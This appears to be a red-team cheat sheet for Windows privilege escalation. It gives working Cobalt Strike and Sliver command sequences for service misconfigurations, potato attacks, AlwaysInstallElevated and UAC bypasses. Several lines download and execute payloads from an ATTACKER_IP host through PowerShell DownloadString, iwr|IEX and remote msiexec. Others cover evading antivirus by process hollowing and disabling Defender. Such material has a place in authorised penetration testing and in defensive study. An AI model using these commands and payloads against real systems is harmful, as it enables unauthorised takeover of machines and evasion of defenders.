Privilege Escalation
Elevating from standard user (medium integrity) to administrator/SYSTEM (high integrity). Only pursue if it enables reaching the objective — priv esc provides defenders with additional detection data points.
OPSEC: Exploiting a priv esc vulnerability is a risk vs reward calculation. Remember the Principle of Least Privilege applies to attackers too — don’t escalate “just because”.
Enumeration
Run automated checks to identify misconfigurations before attempting any exploit.
Cobalt Strike
# SharpUp — audit all checks
beacon> execute-assembly SharpUp.exe audit
# Seatbelt — system and user checks
beacon> execute-assembly Seatbelt.exe -group=system
beacon> execute-assembly Seatbelt.exe -group=user
beacon> execute-assembly Seatbelt.exe -group=allSliver
# SharpUp (use -i for inline execution to bypass AppLocker)
sharpup -- audit
execute-assembly -i /path/to/SharpUp.exe audit
# Seatbelt
seatbelt -- -group=all
seatbelt -- -group=user
# PowerUp via SharpSh (AMSI/CLM bypass)
sharpsh -t 40 -- '-u http://ATTACKER_IP/PowerUp.ps1 -c "Invoke-AllChecks"'
# winPEAS (long runtime — better done interactively)
sharpsh -t 400 -- '-u http://ATTACKER_IP/winPEAS.ps1 -c 1'Manual
# Service enumeration
sc query
Get-Service | fl
# Check current privileges
whoami /all
whoami /priv
# Check registry for autologon creds
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"Unquoted Service Paths
A service binary path containing spaces that is not wrapped in quotes. Windows interprets the space as a terminator and tries paths in order (e.g. C:\Program.exe, C:\Program Files\Vulnerable.exe, etc.).
Requirements:
- Unquoted service path with spaces
- Write permission to an earlier directory in the path
Note: Service payloads must be “service binaries” (svc in the filename) — they need to interact with the Service Control Manager.
Cobalt Strike
# 1. Find unquoted paths
beacon> run wmic service get name, pathname
beacon> execute-assembly SharpUp.exe audit UnquotedServicePath
# 2. Check write permissions on the directory
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Service" | fl
# 3. Upload svc payload (named to match the truncated path)
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp_local_x64.svc.exe
beacon> mv tcp_local_x64.svc.exe Service.exe
# 4. Restart the service
beacon> run sc stop VulnService
beacon> run sc start VulnService
# 5. Connect to the new beacon
beacon> connect localhost 4444Warning: Standard users cannot stop/start services by default — you may need to wait for a reboot.
Weak Service Permissions
The service itself (not the binary) has weak permissions, allowing us to reconfigure where it points.
Cobalt Strike
# 1. Find modifiable services
beacon> execute-assembly SharpUp.exe audit ModifiableServices
# 2. Check current config
beacon> run sc qc VulnService
# 3. Upload svc payload and reconfigure
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> run sc config VulnService binPath= C:\Temp\tcp-local_x64.svc.exe
# 4. Restart service
beacon> run sc stop VulnService
beacon> run sc start VulnService
# 5. Connect
beacon> connect localhost 4444
# 6. Restore original path (preserve the escaped quotes)
beacon> run sc config VulnService binPath= \"C:\Program Files\Vulnerable Services\Service.exe\"Note: The space after
binPath=is intentional — this is howsc configdocuments it.
Weak Service Binary Permissions
The service binary file itself has weak permissions (e.g. BUILTIN\Users Allow Modify), so we can replace it directly.
Cobalt Strike
# 1. Check binary permissions
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service.exe" | fl
# 2. Stop the service (binary is locked while running)
beacon> run sc stop VulnService
# 3. Upload replacement (same filename)
beacon> upload C:\Payloads\Service.exe
# 4. Start service
beacon> run sc start VulnService
beacon> connect localhost 4444Modifiable Service (Sliver)
Abuse a modifiable service to add a domain user to local admins.
Sliver
# 1. Check service config
execute -o sc qc SERVICENAME
# 2. Reconfigure to add user to local admins
execute -o sc config SERVICENAME binPath= "net localgroup Administrators DOMAIN\\user /add" obj= "NT AUTHORITY\\SYSTEM"
execute -o sc config SERVICENAME start= auto
# 3. Verify and trigger
execute -o sc qc SERVICENAME
execute -o sc start SERVICENAME
# 4. Confirm
execute -o net localgroup administratorsSeImpersonatePrivilege
Abuses the SeImpersonatePrivilege (common on service accounts, IIS, SQL) to escalate to SYSTEM via potato attacks.
Sliver
# SweetPotato via execute-assembly (default method)
execute-assembly /path/to/SweetPotato.exe -p C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -a "-ep bypass -nop iex (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/payload.txt')"
# SweetPotato with EfsRpc fallback (if default fails)
execute-assembly /path/to/SweetPotato.exe -e EfsRpc -p C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -a "-ep bypass -nop iex (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/payload.txt')"
# Alternative: donut shellcode injection into a sacrificial process
donut -i /path/to/SweetPotato.exe -a 2 -b 2 -p "-p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a \"IEX((new-object net.webclient).downloadstring('http://ATTACKER_IP/payload.txt'))\"" -o SweetPotato.bin
# Launch sacrificial process and inject
execute notepad
ps -e notepad
execute-shellcode -S -r -I 30 -p <PID> /path/to/SweetPotato.binNote: After getting a SYSTEM shell via SweetPotato, duplicate the implant using process hollowing (
hollow svchost.exe) — the initial shell may be killed by AV.
AlwaysInstallElevated
When both HKCU and HKLM AlwaysInstallElevated registry keys are set to 1, any user can install MSI packages with SYSTEM privileges.
Sliver
# 1. Install wixl (on attacker machine)
sudo apt install wixl
# 2. Clone the MSI template repo
git clone https://github.com/KINGSABRI/MSI-AlwaysInstallElevated
cd MSI-AlwaysInstallElevated
# 3. Copy your payload into the directory
cp /path/to/payload.exe .
# 4. Edit WXS-Templates/alwaysInstallElevated-3.wxs — update the Source attribute:
# <File Id="File0" Name="setup.exe" Source="payload.exe" />
# 5. Compile the MSI
wixl -v WXS-Templates/alwaysInstallElevated-3.wxs -o alwaysInstallElevated.msi
# 6. Host and execute on target (runs as SYSTEM)
execute -t 40 -o msiexec /qn /i http://ATTACKER_IP/alwaysInstallElevated.msiUAC Bypass
UAC forces medium-integrity processes to prompt for consent before running at high integrity. A bypass elevates without the prompt.
Cobalt Strike
# ElevateKit — load elevate.cna into CS via Cobalt Strike > Scripts > Load
# List available elevators
beacon> elevate
beacon> runasadmin
# Spawn elevated session
beacon> elevate <exploit_name> <listener>
beacon> runasadmin <elevator> <command>Sliver
Fodhelper — abuses ms-settings registry + fodhelper.exe auto-elevation:
# 1. Create registry keys
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (iwr http://ATTACKER_IP/payload.txt -usebasicparsing) | IEX" -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
# 2. Trigger
execute -o powershell 'Start-Process "C:\Windows\System32\fodhelper.exe"'
# 3. Verify and get SYSTEM
sa-whoami
getsystemComputerDefaults — similar technique using ComputerDefaults.exe:
# 1. Create registry keys
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
# 2. Set payload command
execute -o powershell 'Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe /c powershell -enc <BASE64_PAYLOAD>" -Force'
# 3. Trigger
execute -o powershell 'Start-Process "C:\Windows\System32\ComputerDefaults.exe"'
# 4. Verify
sa-whoami
getsystemTip: Disable Defender before running
getsystemif possible.